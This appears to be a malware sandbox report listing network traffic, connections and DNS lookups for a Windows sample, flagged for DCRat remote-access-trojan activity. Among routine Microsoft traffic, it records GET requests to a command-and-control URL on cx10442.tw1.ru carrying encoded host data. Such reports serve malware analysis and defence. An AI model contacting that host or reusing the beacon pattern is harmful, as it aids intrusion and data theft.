http://cx10442.tw1.ru/f18a42f1.php?ISU=MhWGysGoR44GhWLI&f5P2y52TogCn0IWP8=8CYOm9qsmT6&4vwgnWEmXmdwK=DBawh0j&bb81c8057f2c5b5ed285ced0baf70984=7f270665d876fbb66f03738bf08cdd54&3064f13b6f0e3ee9f68f8160f6c5065b=wYkFWNmhTYxYjMjZ2NmdTMxMmM3QzYzMzNlhTY1czN1MWZ2cTZhhDN&ISU=MhWGysGoR44GhWLI&f5P2y52TogCn0IWP8=8CYOm9qsmT6&4vwgnWEmXmdwK=DBawh0j
unknown
whitelisted
1176
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
2.16.241.12:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5064
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
7144
SIHClient.exe
GET
200
23.52.120.96:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
3928
ctfmon.exe
GET
200
94.198.223.74:80
http://cx10442.tw1.ru/f18a42f1.php?BiQVNycGVjx9i3Qoj=fgYeDVFV9hNC4Q7&c9de10862b73241675360169003c1342=QOmR2MxcTY5MTMhRjY3QDZwMzYjRDZxQWN3IWMkN2MmhjYhR2NkJDM0UzNwYjMzgjMzgjM1kjN&3064f13b6f0e3ee9f68f8160f6c5065b=gMwY2YxYzNwEWOxUmYzcjNiJTZyEWZkZmNygDMlR2MiNmZyQWN3ADM&f2412832b8db191734a6421eea1e0a91=d1nI2MWN0gTZ4kTY1IjNzUzM1gzY4MmMyEjNjFGMlZmNjNTMlNDM5czYhJiOikTM2cTYjFTZyEWM2UDMkVjY2QTMiVWZzcDZldTMhBTOiwiIxIWY0EDNmhDNlVDMzUmN4MGNiZjN1YWZyMjZ4AjY2MjYlhDOmJTN5IiOiUTZzQmYlRTM0MmY0kzNhVzNllTZjRGN1UTNzMDM1kzYis3W&245d677051a5fd9542fc1d9be47be37f=0VfiIiOiETMmZTNldzN5QTMkVDO1MmM2gjNiVWO1QGMhJGOwITNiwiI2MWN0gTZ4kTY1IjNzUzM1gzY4MmMyEjNjFGMlZmNjNTMlNDM5czYhJiOikTM2cTYjFTZyEWM2UDMkVjY2QTMiVWZzcDZldTMhBTOiwiIxIWY0EDNmhDNlVDMzUmN4MGNiZjN1YWZyMjZ4AjY2MjYlhDOmJTN5IiOiUTZzQmYlRTM0MmY0kzNhVzNllTZjRGN1UTNzMDM1kzYisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXSTplMsdEZqZ0aJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJNXSTtUdkNjY1RXbiZFaDlUdkNjY1RXbiZlSp9UaVdlYoVTVWFlTrl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1VihWNVZVUktWSzlUaUl2bqlUdsdlYrZEMjBnSDxUaJl2TpNWVRVlSDxUaRhVYDJ0QOJTQTples12Y3pEWaBTNXJ1ZBRVTn10MkZnUtJGckxWS2kUajxmWsJGckxWSzBjbJZHZXllasdUYElzUZpGbtNGbxcVUp9maJxWNyImNWdlYwJlbJNXSD10dBRUT3FkaJZTSDJGaSNzY2JkbJNXS5NGbShVWw4kRJtmVHRGc1clVnBzQJtmVXFWbsJTWsJ0MjdWUzI2TKl2TpNWbjZnSDxUaJpWT0QTeOVDMDxEeVpnT1NmeNl2bqlka5ckYpdXaJRlVslkNJNVZ5JlbiFTOykVa3lWSp9maJVXOXFmbW12YpdXaJl2bqlUNShVYqp0QMl2YE1Ue0kXT4lkaMBTSqxkMFpWTp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS1x2VitmRtlkNJNlW0ZUbUlnVyMmVKNETpFVRUtEeFRFSwVFTRlTRWxkTWJVRKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiETMmZTNldzN5QTMkVDO1MmM2gjNiVWO1QGMhJGOwITNiwiI1cTNyIjYkJTY2IWNjBTZ1cjN2EGMyMWOxEzY2MDOwUGMkZWM4MWYlJiOikTM2cTYjFTZyEWM2UDMkVjY2QTMiVWZzcDZldTMhBTOiwiIxIWY0EDNmhDNlVDMzUmN4MGNiZjN1YWZyMjZ4AjY2MjYlhDOmJTN5IiOiUTZzQmYlRTM0MmY0kzNhVzNllTZjRGN1UTNzMDM1kzYis3W
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
192.168.100.255:137
whitelisted
4536
svchost.exe
52.167.17.97:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
52.167.17.97:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4712
MoUsoCoreWorker.exe
2.16.241.12:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4712
MoUsoCoreWorker.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
5064
SearchApp.exe
2.23.227.215:443
www.bing.com
Ooredoo Q.S.C.
QA
whitelisted
1076
svchost.exe
2.23.242.9:443
go.microsoft.com
Ooredoo Q.S.C.
QA
whitelisted
5064
SearchApp.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
1176
svchost.exe
20.190.159.2:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 52.167.17.97
  • 51.104.136.2
  • 4.231.128.59
whitelisted
google.com
  • 142.250.186.110
whitelisted
crl.microsoft.com
  • 2.16.241.12
  • 2.16.241.19
whitelisted
www.microsoft.com
  • 95.101.149.131
  • 23.52.120.96
whitelisted
www.bing.com
  • 2.23.227.215
  • 2.23.227.208
whitelisted
go.microsoft.com
  • 2.23.242.9
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
login.live.com
  • 20.190.159.2
  • 40.126.31.73
  • 20.190.159.64
  • 20.190.159.75
  • 40.126.31.69
  • 20.190.159.73
  • 20.190.159.0
  • 20.190.159.23
whitelisted
cx10442.tw1.ru
  • 94.198.223.74
whitelisted
slscr.update.microsoft.com
  • 20.12.23.50
whitelisted

Threats

PID
Process
Class
Message
A Network Trojan was detected
ET MALWARE DCRAT Activity (GET)
1 ETPRO signatures available at the full report
No debug info